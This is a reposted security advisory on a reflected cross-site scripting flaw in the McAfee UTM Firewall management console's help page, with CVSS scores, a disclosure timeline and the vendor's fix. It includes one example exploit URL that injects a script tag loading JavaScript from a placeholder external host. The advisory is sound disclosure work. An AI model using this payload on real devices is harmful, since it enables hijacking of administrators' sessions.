McAfee UTM Firewall Help Reflected Cross-Site Scripting

2010.06.17
Credit: Adam Baldwin
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

Advisory Information Advisory ID: NGENUITY-2010-005 Date published: 6/9/2010 Vulnerability Information Class: Reflected Cross-Site Scripting (XSS) Software Description McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the affected product line. More information can be found at https://kc.mcafee.com/corporate/index?page=content&id=SB10010 <http://www.mcafee.com/us/enterprise/products/network_security/utm_firew all.html> Vulnerability Description The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) management console is vulnerable to reflected cross-site scripting. It could allow an attacker to cause a user to execute attacker-supplied Javascript code. This attack requires the target to have an existing valid session logged into the UTM device and that the attacker know the internal IP address for the UTM device. McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate this vulnerability *Timeline: * 1/21/2010 - McAfee notified of vulnerability, provided with proof of concept 6/9/2010 - McAfee notified nGenuity of available fix and related information Technical Description *Example Exploit URL: * hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block?><script src=?http://example.com/xss.js?></script> Original Posting: http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cr oss-site-scripting/

Referencje:

https://kc.mcafee.com/corporate/index?page=content&id=SB10010
http://www.vupen.com/english/advisories/2010/1413
http://www.securitytracker.com/id?1024091
http://www.securityfocus.com/archive/1/archive/1/511771/100/0/threaded
http://secunia.com/advisories/40138
http://secunia.com/advisories/40089
http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top